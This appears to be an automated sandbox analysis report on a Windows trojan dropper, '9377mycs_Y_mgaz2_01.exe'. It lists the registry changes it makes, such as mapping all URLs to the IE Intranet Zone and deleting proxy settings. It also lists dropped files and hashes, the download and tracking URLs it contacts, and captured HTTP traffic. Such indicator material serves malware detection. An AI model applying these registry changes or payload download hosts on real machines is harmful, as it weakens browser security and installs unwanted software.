[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process 9377mycs_Y_mgaz2_01.exe:1812 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7F.tmp\%original file name%.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7F.tmp\i.rar, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7F.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz9F.tmp\webctl.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"(Default)" = "%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"DisplayName" = "9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"UninstallString" = "%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 05 5F B0 D1 A5 80 2F 13 6C 17 FD 21 E7 85 FD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process bddownloader.ex:2968 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 8E C4 78 2D CD 90 B5 42 6B A3 6B 5A BA F1 ED"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\106]
"bddownloader.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ©Ã‚Â«Ã‹Å“ÃƒÂ©Ã¢â€šÂ¬Ã…Â¸ÃƒÂ¤Ã‚Â¸Ã¢â‚¬Â¹ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ¥Ã‚Â¼Ã¢â‚¬Â¢ÃƒÂ¦Ã¢â‚¬Å“Ã…Â½"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process MsiExec.exe:3572 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 09 17 36 68 66 A1 00 96 B3 E7 B3 FA F4 4F F9"

Dropped PE files

MD5	File path
d0f2416807f04c559e6394a0a4c7f1d1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\10162111666\LZMA.dll
a177679c7f56a963f03b1dfbb52fd981	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\10162111666\skinconfig\TongJICNZZ.dll
05450face243b3a7472407b999b03a72	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh7F.tmp\nsProcess.dll
3fed8fad8536be426192f52017ee929a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\9377mycs_Y_mgaz2_01.exe
50fdadda3e993688401f6f1108fabdb4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\Inetc.dll
00a0194c20ee912257df53bfe258ee4a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\System.dll
c9653893215bfdb971bcd09c0a6597c7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\netbian_a_41763.exe
05450face243b3a7472407b999b03a72	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\nsProcess.dll
a71cfbf4d290eaa86f864fc29dc7930b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\setup_3386.exe
8250d6c6d6ba52b54379fd4766a8011b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz9F.tmp\webctl.dll
c9653893215bfdb971bcd09c0a6597c7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\netbian_a_41763[1].exe
a71cfbf4d290eaa86f864fc29dc7930b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_3386[1].exe
3fed8fad8536be426192f52017ee929a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\9377mycs_Y_mgaz2_01[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	22738	23040	4.45908	c69726ed422d3dcfdec9731986daa752
.rdata	28672	4496	4608	3.59034	a2c7710fa66fcbb43c7ef0ab9eea5e9a
.data	36864	110456	1024	3.20082	e59cdcb732e4bfbc84cc61dd68354f78
.ndata	147456	36864	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	184320	24960	25088	2.91997	0262781d72780cd03dfc110837d3260c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://123.125.29.252/iplookup/iplookup.php
hxxp://t.cn/RhijzXa	180.149.135.224
hxxp://qifeivisa.com.01cdn.com/2.ico
hxxp://bgp5.yandui.com/dudu/netbian_a_41763.exe
hxxp://aaa.163vv.com/open/setup_3386.exe
hxxp://bgp5.yandui.com/Public/conf/open/1/5_1_0_1_7/10.jpg
hxxp://bgp5.yandui.com/Public/conf/open/1/5_1_0_1_7/11.jpg
hxxp://bgp5.yandui.com/Public/conf/open/1/5_1_0_2_3/10.jpg
hxxp://bgp5.yandui.com/Public/conf/open/1/5_1_0_2_3/11.jpg
hxxp://bgp5.yandui.com/Public/conf/c-lock/5/5_1_0_2_3/41763.xml
hxxp://xnop027.tlgslb.com/Public/Configs/dudu_cnzz/install_begin.html?id=41763
hxxp://bgp5.yandui.com/Public/conf/cpa/2/5_1_0_2_3/41763.xml
hxxp://bgp5.yandui.com/Public/conf/cybercafe_check/index.xml
hxxp://bgp5.yandui.com/Public/conf/resource_donum.xml
hxxp://bgp5.yandui.com/Public/conf/homepage/2/5_1_0_2_3/41763.xml
hxxp://bgp5.yandui.com/Public/conf/icon/2/5_1_0_2_3/41763.xml
hxxp://c.split.cnzz.com/stat.php?id=5578506
hxxp://z12.cnzz.com/stat.htm?id=5578506&r=&lg=en-us&ntime=none&cnzz_eid=605704492-1413501331-&showp=1024x768&t=&h=1&rnd=209985537
hxxp://c.split.cnzz.com/core.php?web_id=5578506&t=z
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=1439782326
hxxp://pcookie.split.cnzz.com/app.gif?&cna=lT/HDA7RDG4CAbhrJibTNcK9
hxxp://update.163vv.com/stj.ashx?v=1.14.930.1&t=41
hxxp://opt.xdwscache.glb0.lxdns.com/20140928/9377mycs_Y_mgaz2_01.exe
hxxp://www.9377.com/api/client_data_receive.php?Name=9377meiying&Channel=mgaz2&referer_param=01&Version=1.1.0.5&IP=192.168.1.129&MAC=00-0C-29-7C-CD-1F&Installtime=2014/10/16/21:11:31&ExeName=C:Documents and SettingsadmLocal SettingsTempsm82.tmp9377mycs_Y_mgaz2_01.exe	119.134.251.172
hxxp://f.handanxinyuan.com/%original file name%.exe/40.jpg	42.121.255.144
hxxp://shadu.n.shifen.com/index/fulldownload/30911
hxxp://t.mou99.com/gcld/01/index.html?agent_id=31&adid=829&game_id=10&rnd=0.134823	222.186.130.93
hxxp://swwx.n.shifen.com/go/full/2/30911
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/20140916/sdins/F0916_s_30911.exe
hxxp://dl1sw.baidu.com/client/20140916/sdins/F0916_s_30911.exe	8.37.235.11
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1439782326	42.120.219.171
hxxp://config.153624.com/Public/conf/open/1/5_1_0_2_3/11.jpg	222.186.60.11
hxxp://s9.cnzz.com/stat.php?id=5578506	1.99.192.15
hxxp://config.153624.com/Public/conf/open/1/5_1_0_1_7/10.jpg	222.186.60.11
hxxp://config.153624.com/Public/conf/open/1/5_1_0_1_7/11.jpg	222.186.60.11
hxxp://config.153624.com/Public/conf/homepage/2/5_1_0_2_3/41763.xml	222.186.60.11
hxxp://config.153624.com/Public/conf/c-lock/5/5_1_0_2_3/41763.xml	222.186.60.11
hxxp://shadu.baidu.com/index/fulldownload/30911	123.125.65.162
hxxp://w.x.baidu.com/go/full/2/30911	123.125.65.175
hxxp://down.yinyue.fm/open/setup_3386.exe	222.186.60.60
hxxp://c.cnzz.com/core.php?web_id=5578506&t=z	42.120.219.6
hxxp://hzs10.cnzz.com/stat.htm?id=5578506&r=&lg=en-us&ntime=none&cnzz_eid=605704492-1413501331-&showp=1024x768&t=&h=1&rnd=209985537	42.156.140.25
hxxp://config.153624.com/Public/conf/cpa/2/5_1_0_2_3/41763.xml	222.186.60.11
hxxp://updatetest.wuji.com/stj.ashx?v=1.14.930.1&t=41	219.232.241.199
hxxp://down.qunasou.com/dudu/netbian_a_41763.exe	222.186.60.11
hxxp://config.153624.com/Public/conf/icon/2/5_1_0_2_3/41763.xml	222.186.60.11
hxxp://config.153624.com/Public/conf/open/1/5_1_0_2_3/10.jpg	222.186.60.11
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php
hxxp://img.wallba.com/Public/Configs/dudu_cnzz/install_begin.html?id=41763	116.10.187.206
hxxp://pcookie.cnzz.com/app.gif?&cna=lT/HDA7RDG4CAbhrJibTNcK9	42.120.219.171
hxxp://xiazai.9377.com/20140928/9377mycs_Y_mgaz2_01.exe	8.37.231.22
hxxp://config.153624.com/Public/conf/cybercafe_check/index.xml	222.186.60.11
hxxp://config.153624.com/Public/conf/resource_donum.xml	222.186.60.11
hxxp://xn--vqq86xovy.xn--fiqs8s/2.ico	222.186.60.68
lib.37wanyou.com	115.29.208.208
web.xinkuai.com	121.10.141.17
update.yinyue.fm
client.9377.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /Public/conf/icon/2/5_1_0_2_3/41763.xml HTTP/1.1

Host: config.153624.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0

Accept-Encoding: deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:15:29 GMT

Content-Type: text/xml

Content-Length: 2048

Last-Modified: Thu, 16 Oct 2014 10:01:39 GMT

Connection: keep-alive

ETag: "543f9783-800"

Accept-Ranges: bytes

..._..O.K......&.......y.....{.".......g.........<..w .L3r\.5...i....6....[|..X..5_.K...............A.V.NU.........O;....JS....................."...<W.(..o.W..U.re.......w...{N..f...hb.....9.O.....:Q.......g...3..4....w...{N.6.Z.. v..3..4....w...{N@.`.p..9z.....>d)..<.....Y&y...s7....3..."..L.@DD.D.....".eG...w(...I..#.......;..8..<..4..._O...'v..1.?.gl.%1].DC.'...Qh9G...`..s........1J.Wi.T. ...k.k..t/=...r......6]T......88._.:/Rmfv...-.]s84.c.....P....!5...u# ..l..S.2i....u.x.b.a......JX.....#..}..c.{..k../o|.?.........../o|.?....kD.B..O...O.x...Q..S........z. .s1......Z...!.M#.).*9.@....m.Y...y.../}=Q......!]m..y...863.. ...@.OQ...0..\...03........%........b..:..aW..6..H1...._<...B...'.i 8..H*K...\}..(...<..,...K ......&...%~.J..V..\XF~...].d_....dC.....i......R..F;...L......-..`./D.....w.O..l.cT.j.w...$@,.X!eGk)2..#. V.(..c5...t....YLv..*......H.K.u..]....H...H.K.u..... ..C._.`8.8.4....l. ......>.........g[.D...H.......*. . Q.3.O..T.r.!|'..*<..2.)D/.....m...3^.W][..GE.2>.F.6K.d7........f.r..l....V........"R..>..(........"..6p....i&......Jz.....#.d.@J&.1...6.$....M...A......}.?......../o..g$.>c....{.J.4....l.(....x.=.Mo....3.v.lQ...m.....C.3c..@(.............Z..z`d......3..d.$..M.... ..5.S.C#......lrE.M,..v.#.....h....x..o.&43......,..........[.........k2*.U.....F..v.M.'Q.......F..jE6..Fzv...U.,.........<.=...k.sG1 ....=.9....k=k.eq.>...{..B(B\.N..?.2..x....^0..Q...[.T.S..X....&......U .....89.?:..M.5.. .f...Sg ....m..l1.....nE...@...n!>......'D..P..3.e.j..XE.l.yQK

<<< skipped >>>

GET /index/fulldownload/30911 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: shadu.baidu.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Found

Date: Thu, 16 Oct 2014 23:15:50 GMT

Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2

Set-Cookie: PHPSESSID=91sqje4h0qgpkak122e01r3lr6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Location: hXXp://w.x.baidu.com/go/full/2/30911

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

GET /go/full/2/30911 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: w.x.baidu.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx/1.4.3

Date: Thu, 16 Oct 2014 23:15:51 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.3.2

Location: hXXp://dl1sw.baidu.com/client/20140916/sdins/F0916_s_30911.exe

GET /core.php?web_id=5578506&t=z HTTP/1.1

Accept: */*

Referer: hXXp://img.wallba.com/Public/Configs/dudu_cnzz/install_begin.html?id=41763

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Date: Thu, 16 Oct 2014 23:15:32 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Thu, 16 Oct 2014 23:15:32 GMT

Expires: Thu, 16 Oct 2014 23:30:32 GMT

2ed..!function(){var p,q,r,a=encodeURIComponent,b="5578506",c="",d="",e="online_v3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();..0..

GET /stj.ashx?v=1.14.930.1&t=41 HTTP/1.1

Host: updatetest.wuji.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.5.10

Date: Thu, 16 Oct 2014 23:15:36 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

3..0A0..0..

GET /Public/conf/open/1/5_1_0_1_7/10.jpg HTTP/1.1

Host: config.153624.com

Accept:

Referer: hXXp://VVV.kuping.cc/

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)

Range: bytes=0-

HTTP/1.1 206 Partial Content

Server: nginx

Date: Thu, 16 Oct 2014 23:15:21 GMT

Content-Type: image/jpeg

Content-Length: 631

Last-Modified: Thu, 24 Jul 2014 06:02:47 GMT

Connection: keep-alive

ETag: "53d0a187-277"

Content-Range: bytes 0-630/631

GET /2.ico HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: xn--vqq86xovy.xn--fiqs8s

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Length: 545307

Content-Type: image/x-icon

Last-Modified: Thu, 16 Oct 2014 17:28:44 GMT

Accept-Ranges: bytes

ETag: "f03b97a266e9cf1:25d"

Server: Microsoft-IIS/6.0

Date: Thu, 16 Oct 2014 23:14:44 GMT

............ .( ......(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /Public/conf/c-lock/5/5_1_0_2_3/41763.xml HTTP/1.1

Host: config.153624.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0

Accept-Encoding: deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:15:25 GMT

Content-Type: text/xml

Content-Length: 2352

Last-Modified: Fri, 10 Oct 2014 10:20:11 GMT

Connection: keep-alive

ETag: "5437b2db-930"

Accept-Ranges: bytes

.h....N..KN ...M..n7.#...!..t[......7....Zh.....].W._..C.S."..V|..#..o....R.R:..R...17.[.@.$.o.......JK...n7.#....)..vW....B....|.p....1J..S"....].a..:7j[........R.R:..qE.0.J.|.....|.n.0 .%b.......H..~.{..../......:^.K?.e.........`).r...c.....n4[9!V~....~...X{|y....W?.Cqr.Z..........p ..&S!.GB^W=...W....q.$.me...v3L..Y*.7.}I.)Q}. /!..HG..OYq....H...?dJTm...U,*Z...:...W?.Cqr..?..)...%6.jp%.....gM.#.'.N.z...RE...@...]......U..L.Jv:..n...gU.......^z..Z..... ..m...=...j.....9..0L=...W...\..N..<.?.. ..o..-. ...[..n7.#....../.j..N[..@I.9...>...21.....w=.,"....Y,..$_..`...f ......|/>q..``..5..d....d...C\......_.k.%...K4x1z|3- 